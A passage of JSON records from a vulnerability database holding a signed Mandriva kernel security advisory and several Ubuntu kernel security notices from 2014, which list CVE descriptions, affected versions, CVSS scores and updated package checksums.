"CVE-2014-3181", "CVE-2014-5472", "CVE-2014-7975", "CVE-2014-3185", "CVE-2014-5206", "CVE-2014-3601", "CVE-2014-3534", "CVE-2014-6410", "CVE-2014-5471", "CVE-2014-3184"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:201\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : kernel\r\n Date : October 21, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been found and corrected in the Linux\r\n kernel:\r\n \r\n The try_to_unmap_cluster function in mm/rmap.c in the Linux kernel\r\n before 3.14.3 does not properly consider which pages must be locked,\r\n which allows local users to cause a denial of service (system crash) by\r\n triggering a memory-usage pattern that requires removal of page-table\r\n mappings (CVE-2014-3122).\r\n \r\n Multiple stack-based buffer overflows in the magicmouse_raw_event\r\n function in drivers/hid/hid-magicmouse.c in the Magic Mouse HID driver\r\n in the Linux kernel through 3.16.3 allow physically proximate attackers\r\n to cause a denial of service (system crash) or possibly execute\r\n arbitrary code via a crafted device that provides a large amount of\r\n (1) EHCI or (2) XHCI data associated with an event (CVE-2014-3181).\r\n \r\n Array index error in the logi_dj_raw_event function in\r\n drivers/hid/hid-logitech-dj.c in the Linux kernel before 3.16.2 allows\r\n physically proximate attackers to execute arbitrary code or cause a\r\n denial of service (invalid kfree) via a crafted device that provides\r\n a malformed REPORT_TYPE_NOTIF_DEVICE_UNPAIRED value (CVE-2014-3182).\r\n \r\n The report_fixup functions in the HID subsystem in the Linux\r\n kernel before 3.16.2 might allow physically proximate attackers\r\n to cause a denial of service (out-of-bounds write) via a crafted\r\n device that provides a small report descriptor, related to\r\n (1) drivers/hid/hid-cherry.c, (2) drivers/hid/hid-kye.c,\r\n (3) drivers/hid/hid-lg.c, (4) drivers/hid/hid-monterey.c, (5)\r\n drivers/hid/hid-petalynx.c, and (6) drivers/hid/hid-sunplus.c\r\n (CVE-2014-3184).\r\n \r\n Multiple buffer overflows in the command_port_read_callback function in\r\n drivers/usb/serial/whiteheat.c in the Whiteheat USB Serial Driver in\r\n the Linux kernel before 3.16.2 allow physically proximate attackers\r\n to execute arbitrary code or cause a denial of service (memory\r\n corruption and system crash) via a crafted device that provides a large\r\n amount of (1) EHCI or (2) XHCI data associated with a bulk response\r\n (CVE-2014-3185).\r\n \r\n Buffer overflow in the picolcd_raw_event function in\r\n devices/hid/hid-picolcd_core.c in the PicoLCD HID device driver in the\r\n Linux kernel through 3.16.3, as used in Android on Nexus 7 devices,\r\n allows physically proximate attackers to cause a denial of service\r\n (system crash) or possibly execute arbitrary code via a crafted device\r\n that sends a large report (CVE-2014-3186).\r\n \r\n arch/s390/kernel/ptrace.c in the Linux kernel before 3.15.8 on the s390\r\n platform does not properly restrict address-space control operations\r\n in PTRACE_POKEUSR_AREA requests, which allows local users to obtain\r\n read and write access to kernel memory locations, and consequently gain\r\n privileges, via a crafted application that makes a ptrace system call\r\n (CVE-2014-3534).\r\n \r\n The kvm_iommu_map_pages function in virt/kvm/iommu.c in the Linux\r\n kernel through 3.16.1 miscalculates the number of pages during the\r\n handling of a mapping failure, which allows guest OS users to (1)\r\n cause a denial of service (host OS memory corruption) or possibly\r\n have unspecified other impact by triggering a large gfn value or (2)\r\n cause a denial of service (host OS memory consumption) by triggering a\r\n small gfn value that leads to permanently pinned pages (CVE-2014-3601).\r\n \r\n The sctp_assoc_update function in net/sctp/associola.c in the\r\n Linux kernel through 3.15.8, when SCTP authentication is enabled,\r\n allows remote attackers to cause a denial of service (NULL pointer\r\n dereference and OOPS) by starting to establish an association between\r\n two endpoints immediately after an exchange of INIT and INIT ACK\r\n chunks to establish an earlier association between these endpoints\r\n in the opposite direction (CVE-2014-5077).\r\n \r\n The do_remount function in fs/namespace.c in the Linux kernel through\r\n 3.16.1 does not maintain the MNT_LOCK_READONLY bit across a remount of\r\n a bind mount, which allows local users to bypass an intended read-only\r\n restriction and defeat certain sandbox protection mechanisms via a\r\n mount -o remount command within a user namespace (CVE-2014-5206).\r\n \r\n Stack consumption vulnerability in the parse_rock_ridge_inode_internal\r\n function in fs/isofs/rock.c in the Linux kernel through 3.16.1 allows\r\n local users to cause a denial of service (uncontrolled recursion, and\r\n system crash or reboot) via a crafted iso9660 image with a CL entry\r\n referring to a directory entry that has a CL entry (CVE-2014-5471).\r\n \r\n The parse_rock_ridge_inode_internal function in fs/isofs/rock.c in\r\n the Linux kernel through 3.16.1 allows local users to cause a denial\r\n of service (unkillable mount process) via a crafted iso9660 image\r\n with a self-referential CL entry (CVE-2014-5472).\r\n \r\n The __udf_read_inode function in fs/udf/inode.c in the Linux kernel\r\n through 3.16.3 does not restrict the amount of ICB indirection, which\r\n allows physically proximate attackers to cause a denial of service\r\n (infinite loop or stack consumption) via a UDF filesystem with a\r\n crafted inode (CVE-2014-6410).\r\n \r\n The do_umount function in fs/namespace.c in the Linux kernel through\r\n 3.17 does not require the CAP_SYS_ADMIN capability for do_remount_sb\r\n calls that change the root filesystem to read-only, which allows\r\n local users to cause a denial of service (loss of writability) by\r\n making certain unshare system calls, clearing the / MNT_LOCKED flag,\r\n and making an MNT_FORCE umount system call (CVE-2014-7975).\r\n \r\n The updated packages provides a solution for these security issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3122\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3181\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3182\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3184\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3185\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3186\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3534\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3601\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5206\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6410\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7975\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 706f1d3e028f5c472fae4cd5647fdf2c mbs1/x86_64/cpupower-3.4.104-1.1.mbs1.x86_64.rpm\r\n 0197c7237e6de17e12ed06e19a24a1f3 mbs1/x86_64/kernel-firmware-3.4.104-1.1.mbs1.noarch.rpm\r\n 02105e0da2b67be743fc2fb09e5cb7bd mbs1/x86_64/kernel-headers-3.4.104-1.1.mbs1.x86_64.rpm\r\n c7c658c1fb347718937a094224ac8253 mbs1/x86_64/kernel-server-3.4.104-1.1.mbs1.x86_64.rpm\r\n 72d8fab7697670cbc0e133f60c5c9106 mbs1/x86_64/kernel-server-devel-3.4.104-1.1.mbs1.x86_64.rpm\r\n e4352dee03821deb157454ca1ee5c085 mbs1/x86_64/kernel-source-3.4.104-1.mbs1.noarch.rpm\r\n c7c93d2471a205797fa628405cee250b mbs1/x86_64/lib64cpupower0-3.4.104-1.1.mbs1.x86_64.rpm\r\n 09c3ce0b324c9f077a25435f2fadfa54 mbs1/x86_64/lib64cpupower-devel-3.4.104-1.1.mbs1.x86_64.rpm\r\n 46e6313a2a74f0c6e5704a84ad6a9350 mbs1/x86_64/perf-3.4.104-1.1.mbs1.x86_64.rpm \r\n 6ba4c2613b0c731f74e349feb08aa7ed mbs1/SRPMS/cpupower-3.4.104-1.1.mbs1.src.rpm\r\n fb946993475cccf1445d9dc5d03578f0 mbs1/SRPMS/kernel-firmware-3.4.104-1.1.mbs1.src.rpm\r\n ecd7276d9cbe6d58d0ff72437e942155 mbs1/SRPMS/kernel-headers-3.4.104-1.1.mbs1.src.rpm\r\n e47de9f04bd8c4fa65cd7064d7162beb mbs1/SRPMS/kernel-server-3.4.104-1.1.mbs1.src.rpm\r\n 0904c9462ac38c922acb9163c30733ff mbs1/SRPMS/kernel-source-3.4.104-1.mbs1.src.rpm\r\n 94ce7abe8ff4987551f0570443855114 mbs1/SRPMS/perf-3.4.104-1.1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFURhGCmqjQ0CJFipgRAoLRAKDR5wdSK1v3VCX41UNZ8jt4WXTXAgCg2cT9\r\n1AkEOWCipx3+f5N53jNv2FE=\r\n=R/oJ\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-10-27T00:00:00", "published": "2014-10-27T00:00:00", "id": "SECURITYVULNS:DOC:31315", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31315", "title": "[ MDVSA-2014:201 ] kernel", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:58", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3186", "CVE-2014-6417", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-6416", "CVE-2014-3631", "CVE-2014-6418", "CVE-2014-6410", "CVE-2014-3184"], "description": "Steven Vittitoe reported multiple stack buffer overflows in Linux kernel's \nmagicmouse HID driver. A physically proximate attacker could exploit this \nflaw to cause a denial of service (system crash) or possibly execute \narbitrary code via specially crafted devices. (CVE-2014-3181)\n\nBen Hawkes reported some off by one errors for report descriptors in the \nLinux kernel's HID stack. A physically proximate attacker could exploit \nthese flaws to cause a denial of service (out-of-bounds write) via a \nspecially crafted device. (CVE-2014-3184)\n\nSeveral bounds check flaws allowing for buffer overflows were discovered in \nthe Linux kernel's Whiteheat USB serial driver. A physically proximate \nattacker could exploit these flaws to cause a denial of service (system \ncrash) via a specially crafted device. (CVE-2014-3185)\n\nSteven Vittitoe reported a buffer overflow in the Linux kernel's PicoLCD \nHID device driver. A physically proximate attacker could exploit this flaw \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode via a specially craft device. (CVE-2014-3186)\n\nA flaw was discovered in the Linux kernel's associative-array garbage \ncollection implementation. A local user could exploit this flaw to cause a \ndenial of service (system crash) or possibly have other unspecified impact \nby using keyctl operations. (CVE-2014-3631)\n\nA flaw was discovered in the Linux kernel's UDF filesystem (used on some \nCD-ROMs and DVDs) when processing indirect ICBs. An attacker who can cause \nCD, DVD or image file with a specially crafted inode to be mounted can \ncause a denial of service (infinite loop or stack consumption). \n(CVE-2014-6410)\n\nJames Eckersall discovered a buffer overflow in the Ceph filesystem in the \nLinux kernel. A remote attacker could exploit this flaw to cause a denial \nof service (memory consumption and panic) or possibly have other \nunspecified impact via a long unencrypted auth ticket. (CVE-2014-6416)\n\nJames Eckersall discovered a flaw in the handling of memory allocation \nfailures in the Ceph filesystem. A remote attacker could exploit this flaw \nto cause a denial of service (system crash) or possibly have unspecified \nother impact. (CVE-2014-6417)\n\nJames Eckersall discovered a flaw in how the Ceph filesystem validates auth \nreplies. A remote attacker could exploit this flaw to cause a denial of \nservice (system crash) or possibly have other unspecified impact. \n(CVE-2014-6418)", "edition": 5, "modified": "2014-10-09T00:00:00", "published": "2014-10-09T00:00:00", "id": "USN-2378-1", "href": "https://ubuntu.com/security/notices/USN-2378-1", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:32:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3186", "CVE-2014-6417", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-6416", "CVE-2014-3631", "CVE-2014-6418", "CVE-2014-6410", "CVE-2014-3184"], "description": "Steven Vittitoe reported multiple stack buffer overflows in Linux kernel's \nmagicmouse HID driver. A physically proximate attacker could exploit this \nflaw to cause a denial of service (system crash) or possibly execute \narbitrary code via specially crafted devices. (CVE-2014-3181)\n\nBen Hawkes reported some off by one errors for report descriptors in the \nLinux kernel's HID stack. A physically proximate attacker could exploit \nthese flaws to cause a denial of service (out-of-bounds write) via a \nspecially crafted device. (CVE-2014-3184)\n\nSeveral bounds check flaws allowing for buffer overflows were discovered in \nthe Linux kernel's Whiteheat USB serial driver. A physically proximate \nattacker could exploit these flaws to cause a denial of service (system \ncrash) via a specially crafted device. (CVE-2014-3185)\n\nSteven Vittitoe reported a buffer overflow in the Linux kernel's PicoLCD \nHID device driver. A physically proximate attacker could exploit this flaw \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode via a specially craft device. (CVE-2014-3186)\n\nA flaw was discovered in the Linux kernel's associative-array garbage \ncollection implementation. A local user could exploit this flaw to cause a \ndenial of service (system crash) or possibly have other unspecified impact \nby using keyctl operations. (CVE-2014-3631)\n\nA flaw was discovered in the Linux kernel's UDF filesystem (used on some \nCD-ROMs and DVDs) when processing indirect ICBs. An attacker who can cause \nCD, DVD or image file with a specially crafted inode to be mounted can \ncause a denial of service (infinite loop or stack consumption). \n(CVE-2014-6410)\n\nJames Eckersall discovered a buffer overflow in the Ceph filesystem in the \nLinux kernel. A remote attacker could exploit this flaw to cause a denial \nof service (memory consumption and panic) or possibly have other \nunspecified impact via a long unencrypted auth ticket. (CVE-2014-6416)\n\nJames Eckersall discovered a flaw in the handling of memory allocation \nfailures in the Ceph filesystem. A remote attacker could exploit this flaw \nto cause a denial of service (system crash) or possibly have unspecified \nother impact. (CVE-2014-6417)\n\nJames Eckersall discovered a flaw in how the Ceph filesystem validates auth \nreplies. A remote attacker could exploit this flaw to cause a denial of \nservice (system crash) or possibly have other unspecified impact. \n(CVE-2014-6418)", "edition": 5, "modified": "2014-10-09T00:00:00", "published": "2014-10-09T00:00:00", "id": "USN-2379-1", "href": "https://ubuntu.com/security/notices/USN-2379-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:39:08", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3182", "CVE-2014-3186", "CVE-2014-6417", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-6416", "CVE-2014-6418", "CVE-2014-6410", "CVE-2014-3184"], "description": "Steven Vittitoe reported multiple stack buffer overflows in Linux kernel's \nmagicmouse HID driver. A physically proximate attacker could exploit this \nflaw to cause a denial of service (system crash) or possibly execute \narbitrary code via specially crafted devices. (CVE-2014-3181)\n\nA bounds check error was discovered in the driver for the Logitech Unifying \nreceivers and devices. A physically proximate attacker could exploit this \nflaw to to cause a denial of service (invalid kfree) or to execute \narbitrary code. (CVE-2014-3182)\n\nBen Hawkes reported some off by one errors for report descriptors in the \nLinux kernel's HID stack. A physically proximate attacker could exploit \nthese flaws to cause a denial of service (out-of-bounds write) via a \nspecially crafted device. (CVE-2014-3184)\n\nSeveral bounds check flaws allowing for buffer overflows were discovered in \nthe Linux kernel's Whiteheat USB serial driver. A physically proximate \nattacker could exploit these flaws to cause a denial of service (system \ncrash) via a specially crafted device. (CVE-2014-3185)\n\nSteven Vittitoe reported a buffer overflow in the Linux kernel's PicoLCD \nHID device driver. A physically proximate attacker could exploit this flaw \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode via a specially craft device. (CVE-2014-3186)\n\nA flaw was discovered in the Linux kernel's UDF filesystem (used on some \nCD-ROMs and DVDs) when processing indirect ICBs. An attacker who can cause \nCD, DVD or image file with a specially crafted inode to be mounted can \ncause a denial of service (infinite loop or stack consumption). \n(CVE-2014-6410)\n\nJames Eckersall discovered a buffer overflow in the Ceph filesystem in the \nLinux kernel. A remote attacker could exploit this flaw to cause a denial \nof service (memory consumption and panic) or possibly have other \nunspecified impact via a long unencrypted auth ticket. (CVE-2014-6416)\n\nJames Eckersall discovered a flaw in the handling of memory allocation \nfailures in the Ceph filesystem. A remote attacker could exploit this flaw \nto cause a denial of service (system crash) or possibly have unspecified \nother impact. (CVE-2014-6417)\n\nJames Eckersall discovered a flaw in how the Ceph filesystem validates auth \nreplies. A remote attacker could exploit this flaw to cause a denial of \nservice (system crash) or possibly have other unspecified impact. \n(CVE-2014-6418)", "edition": 5, "modified": "2014-10-09T00:00:00", "published": "2014-10-09T00:00:00", "id": "USN-2376-1", "href": "https://ubuntu.com/security/notices/USN-2376-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:35:19", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3182", "CVE-2014-3186", "CVE-2014-6417", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-6416", "CVE-2014-6418", "CVE-2014-6410", "CVE-2014-3184"], "description": "Steven Vittitoe reported multiple stack buffer overflows in Linux kernel's \nmagicmouse HID driver. A physically proximate attacker could exploit this \nflaw to cause a denial of service (system crash) or possibly execute \narbitrary code via specially crafted devices. (CVE-2014-3181)\n\nA bounds check error was discovered in the driver for the Logitech Unifying \nreceivers and devices. A physically proximate attacker could exploit this \nflaw to to cause a denial of service (invalid kfree) or to execute \narbitrary code. (CVE-2014-3182)\n\nBen Hawkes reported some off by one errors for report descriptors in the \nLinux kernel's HID stack. A physically proximate attacker could exploit \nthese flaws to cause a denial of service (out-of-bounds write) via a \nspecially crafted device. (CVE-2014-3184)\n\nSeveral bounds check flaws allowing for buffer overflows were discovered in \nthe Linux kernel's Whiteheat USB serial driver. A physically proximate \nattacker could exploit these flaws to cause a denial of service (system \ncrash) via a specially crafted device. (CVE-2014-3185)\n\nSteven Vittitoe reported a buffer overflow in the Linux kernel's PicoLCD \nHID device driver. A physically proximate attacker could exploit this flaw \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode via a specially craft device. (CVE-2014-3186)\n\nA flaw was discovered in the Linux kernel's UDF filesystem (used on some \nCD-ROMs and DVDs) when processing indirect ICBs. An attacker who can cause \nCD, DVD or image file with a specially crafted inode to be mounted can \ncause a denial of service (infinite loop or stack consumption). \n(CVE-2014-6410)\n\nJames Eckersall discovered a buffer overflow in the Ceph filesystem in the \nLinux kernel. A remote attacker could exploit this flaw to cause a denial \nof service (memory consumption and panic) or possibly have other \nunspecified impact via a long unencrypted auth ticket. (CVE-2014-6416)\n\nJames Eckersall discovered a flaw in the handling of memory allocation \nfailures in the Ceph filesystem. A remote attacker could exploit this flaw \nto cause a denial of service (system crash) or possibly have unspecified \nother impact. (CVE-2014-6417)\n\nJames Eckersall discovered a flaw in how the Ceph filesystem validates auth \nreplies. A remote attacker could exploit this flaw to cause a denial of \nservice (system crash) or possibly have other unspecified impact. \n(CVE-2014-6418)", "edition": 5, "modified": "2014-10-09T00:00:00", "published": "2014-10-09T00:00:00", "id": "USN-2377-1", "href": "https://ubuntu.com/security/notices/USN-2377-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-08-14T14:09:08", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5077", "CVE-2014-4655", "CVE-2014-4653", "CVE-2014-4171", "CVE-2014-3917", "CVE-2014-4027", "CVE-2014-4654", "CVE-2014-4656", "CVE-2014-4652", "CVE-2014-4667"], "description": "An flaw was discovered in the Linux kernel's audit subsystem when auditing \ncertain syscalls. A local attacker could exploit this flaw to obtain \npotentially sensitive single-bit values from kernel memory or cause a \ndenial of service (OOPS). (CVE-2014-3917)\n\nAn information leak was discovered in the rd_mcp backend of the iSCSI \ntarget subsystem in the Linux kernel. A local user could exploit this flaw \nto obtain sensitive information from ramdisk_mcp memory by leveraging \naccess to a SCSI initiator. (CVE-2014-4027)\n\nSasha Levin reported an issue with the Linux kernel's shared memory \nsubsystem when used with range notifications and hole punching. A local \nuser could exploit this flaw to cause a denial of service. (CVE-2014-4171)\n\nAn information leak was discovered in the control implemenation of the \nAdvanced Linux Sound Architecture (ALSA) subsystem in the Linux kernel. A \nlocal user could exploit this flaw to obtain sensitive information from \nkernel memory. (CVE-2014-4652)\n\nA use-after-free flaw was discovered in the Advanced Linux Sound \nArchitecture (ALSA) control implementation of the Linux kernel. A local \nuser could exploit this flaw to cause a denial of service (system crash). \n(CVE-2014-4653)\n\nA authorization bug was discovered with the snd_ctl_elem_add function of \nthe Advanced Linux Sound Architecture (ALSA) in the Linux kernel. A local \nuser could exploit his bug to cause a denial of service (remove kernel \ncontrols). (CVE-2014-4654)\n\nA flaw discovered in how the snd_ctl_elem function of the Advanced Linux \nSound Architecture (ALSA) handled a reference count. A local user could \nexploit this flaw to cause a denial of service (integer overflow and limit \nbypass). (CVE-2014-4655)\n\nAn integer overflow flaw was discovered in the control implementation of \nthe Advanced Linux Sound Architecture (ALSA). A local user could exploit \nthis flaw to cause a denial of service (system crash). (CVE-2014-4656)\n\nAn integer underflow flaw was discovered in the Linux kernel's handling of \nthe backlog value for certain SCTP packets. A remote attacker could exploit \nthis flaw to cause a denial of service (socket outage) via a crafted SCTP \npacket. (CVE-2014-4667)\n\nJason Gunthorpe reported a flaw with SCTP authentication in the Linux \nkernel. A remote attacker could exploit this flaw to cause a denial of \nservice (NULL pointer dereference and OOPS). (CVE-2014-5077)", "edition": 6, "modified": "2014-09-02T00:00:00", "published": "2014-09-02T00:00:00", "id": "USN-2335-1", "href": "https://ubuntu.com/security/notices/USN-2335-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-08-14T14:10:59", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5077", "CVE-2014-4655", "CVE-2014-4508", "CVE-2014-4653", "CVE-2014-4171", "CVE-2014-3917", "CVE-2014-4027", "CVE-2014-4654", "CVE-2014-4656", "CVE-2014-4652", "CVE-2014-4667"], "description": "An flaw was discovered in the Linux kernel's audit subsystem when auditing \ncertain syscalls. A local attacker could exploit this flaw to obtain \npotentially sensitive single-bit values from kernel memory or cause a \ndenial of service (OOPS). (CVE-2014-3917)\n\nAn information leak was discovered in the rd_mcp backend of the iSCSI \ntarget subsystem in the Linux kernel. A local user could exploit this flaw \nto obtain sensitive information from ramdisk_mcp memory by leveraging \naccess to a SCSI initiator. (CVE-2014-4027)\n\nSasha Levin reported an issue with the Linux kernel's shared memory \nsubsystem when used with range notifications and hole punching. A local \nuser could exploit this flaw to cause a denial of service. (CVE-2014-4171)\n\nToralf F\u00f6rster reported an error in the Linux kernels syscall auditing on \n32 bit x86 platforms. A local user could exploit this flaw to cause a \ndenial of service (OOPS and system crash). (CVE-2014-4508)\n\nAn information leak was discovered in the control implemenation of the \nAdvanced Linux Sound Architecture (ALSA) subsystem in the Linux kernel. A \nlocal user could exploit this flaw to obtain sensitive information from \nkernel memory. (CVE-2014-4652)\n\nA use-after-free flaw was discovered in the Advanced Linux Sound \nArchitecture (ALSA) control implementation of the Linux kernel. A local \nuser could exploit this flaw to cause a denial of service (system crash). \n(CVE-2014-4653)\n\nA authorization bug was discovered with the snd_ctl_elem_add function of \nthe Advanced Linux Sound Architecture (ALSA) in the Linux kernel. A local \nuser could exploit his bug to cause a denial of service (remove kernel \ncontrols). (CVE-2014-4654)\n\nA flaw discovered in how the snd_ctl_elem function of the Advanced Linux \nSound Architecture (ALSA) handled a reference count. A local user could \nexploit this flaw to cause a denial of service (integer overflow and limit \nbypass). (CVE-2014-4655)\n\nAn integer overflow flaw was discovered in the control implementation of \nthe Advanced Linux Sound Architecture (ALSA). A local user could exploit \nthis flaw to cause a denial of service (system crash). (CVE-2014-4656)\n\nAn integer underflow flaw was discovered in the Linux kernel's handling of \nthe backlog value for certain SCTP packets. A remote attacker could exploit \nthis flaw to cause a denial of service (socket outage) via a crafted SCTP \npacket. (CVE-2014-4667)\n\nJason Gunthorpe reported a flaw with SCTP authentication in the Linux \nkernel. A remote attacker could exploit this flaw to cause a denial of \nservice (NULL pointer dereference and OOPS). (CVE-2014-5077)", "edition": 69, "modified": "2014-09-02T00:00:00", "published": "2014-09-02T00:00:00", "id": "USN-2334-1", "href": "https://ubuntu.com/security/notices/USN-2334-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-18T01:42:49", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0131", "CVE-2014-1739", "CVE-2014-4943", "CVE-2014-4014", "CVE-2014-3917", "CVE-2014-4027"], "description": "Sasha Levin reported a flaw in the Linux kernel's point-to-point protocol \n(PPP) when used with the Layer Two Tunneling Protocol (L2TP). A local user \ncould exploit this flaw to gain administrative privileges. (CVE-2014-4943)\n\nMichael S. Tsirkin discovered an information leak in the Linux kernel's \nsegmentation of skbs when using the zerocopy feature of vhost-net. A local \nattacker could exploit this flaw to gain potentially sensitive information \nfrom kernel memory. (CVE-2014-0131)\n\nSalva Peir\u00f3 discovered an information leak in the Linux kernel's media- \ndevice driver. A local attacker could exploit this flaw to obtain sensitive \ninformation from kernel memory. (CVE-2014-1739)\n\nAn flaw was discovered in the Linux kernel's audit subsystem when auditing \ncertain syscalls. A local attacker could exploit this flaw to obtain \npotentially sensitive single-bit values from kernel memory or cause a \ndenial of service (OOPS). (CVE-2014-3917)\n\nA flaw was discovered in the Linux kernel's implementation of user \nnamespaces with respect to inode permissions. A local user could exploit \nthis flaw by creating a user namespace to gain administrative privileges. \n(CVE-2014-4014)\n\nAn information leak was discovered in the rd_mcp backend of the iSCSI \ntarget subsystem in the Linux kernel. A local user could exploit this flaw \nto obtain sensitive information from ramdisk_mcp memory by leveraging \naccess to a SCSI initiator. (CVE-2014-4027)", "edition": 6, "modified": "2014-07-17T00:00:00", "published": "2014-07-17T00:00:00", "id": "USN-2285-1", "href": "https://ubuntu.com/security/notices/USN-2285-1", "title": "Linux kernel (Quantal HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-15T13:51:54", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0155", "CVE-2014-4655", "CVE-2014-4508", "CVE-2014-0206", "CVE-2014-4653", "CVE-2014-4171", "CVE-2014-4014", "CVE-2014-4027", "CVE-2014-4654", "CVE-2014-5045", "CVE-2014-4656", "CVE-2014-0181", "CVE-2014-4652", "CVE-2014-4667"], "description": "A flaw was discovered in the Linux kernel virtual machine's (kvm) \nvalidation of interrupt requests (irq). A guest OS user could exploit this \nflaw to cause a denial of service (host OS crash). (CVE-2014-0155)\n\nAndy Lutomirski discovered a flaw in the authorization of netlink socket \noperations when a socket is passed to a process of more privilege. A local \nuser could exploit this flaw to bypass access restrictions by having a \nprivileged executable do something it was not intended to do. \n(CVE-2014-0181)\n\nAn information leak was discovered in the Linux kernels \naio_read_events_ring function. A local user could exploit this flaw to \nobtain potentially sensitive information from kernel memory. \n(CVE-2014-0206)\n\nA flaw was discovered in the Linux kernel's implementation of user \nnamespaces with respect to inode permissions. A local user could exploit \nthis flaw by creating a user namespace to gain administrative privileges. \n(CVE-2014-4014)\n\nAn information leak was discovered in the rd_mcp backend of the iSCSI \ntarget subsystem in the Linux kernel. A local user could exploit this flaw \nto obtain sensitive information from ramdisk_mcp memory by leveraging \naccess to a SCSI initiator. (CVE-2014-4027)\n\nSasha Levin reported an issue with the Linux kernel's shared memory \nsubsystem when used with range notifications and hole punching. A local \nuser could exploit this flaw to cause a denial of service. (CVE-2014-4171)\n\nToralf F\u00f6rster reported an error in the Linux kernels syscall auditing on \n32 bit x86 platforms. A local user could exploit this flaw to cause a \ndenial of service (OOPS and system crash). (CVE-2014-4508)\n\nAn information leak was discovered in the control implemenation of the \nAdvanced Linux Sound Architecture (ALSA) subsystem in the Linux kernel. A \nlocal user could exploit this flaw to obtain sensitive information from \nkernel memory. (CVE-2014-4652)\n\nA use-after-free flaw was discovered in the Advanced Linux Sound \nArchitecture (ALSA) control implementation of the Linux kernel. A local \nuser could exploit this flaw to cause a denial of service (system crash). \n(CVE-2014-4653)\n\nA authorization bug was discovered with the snd_ctl_elem_add function of \nthe Advanced Linux Sound Architecture (ALSA) in the Linux kernel. A local \nuser could exploit his bug to cause a denial of service (remove kernel \ncontrols). (CVE-2014-4654)\n\nA flaw discovered in how the snd_ctl_elem function of the Advanced Linux \nSound Architecture (ALSA) handled a reference count. A local user could \nexploit this flaw to cause a denial of service (integer overflow and limit 